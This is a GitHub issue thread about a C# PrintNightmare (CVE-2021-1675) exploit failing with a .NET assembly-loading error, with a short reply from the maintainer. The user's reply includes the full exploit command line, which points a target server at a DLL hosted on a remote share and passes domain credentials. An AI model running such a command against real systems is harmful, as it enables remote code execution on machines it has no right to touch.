CVE-2021-1675 icon indicating copy to clipboard operation
CVE-2021-1675 copied to clipboard

C# Version can't run

Open IMnewer opened this issue 4 years ago • 2 comments

The C# exp error:

Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'System.Core, Version=4.0.0.0, Culture=neutral, Public KeyToken=b77a5c561934e089' or one of its dependencies. The system cannot find the path specified. at SharpPrintNightmare.Program.getDrivers(String computername) at SharpPrintNightmare.Program.Main(String[] args)

Target Framework is set to 4.0

IMnewer avatar Jul 05 '21 02:07 IMnewer

paste full input and output please

cube0x0 avatar Jul 05 '21 11:07 cube0x0

Just this : SharpPrintNightmare.exe "\\192.168.1.10\share\calc.dll" "\\192.168.1.11" domain.local test1 test1

Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'System.Core, Version=4.0.0.0, Culture=neutral, Public KeyToken=b77a5c561934e089' or one of its dependencies. The system cannot find the path specified. at SharpPrintNightmare.Program.getDrivers(String computername) at SharpPrintNightmare.Program.Main(String[] args)

The system is Microsoft Windows 7 Ultimate ( 6.1.7601 Service Pack 1 Build 7601 ). target is Microsoft Windows Server 2016 Datacenter ( 10.0.14393 N/A Build 14393)

IMnewer avatar Jul 06 '21 00:07 IMnewer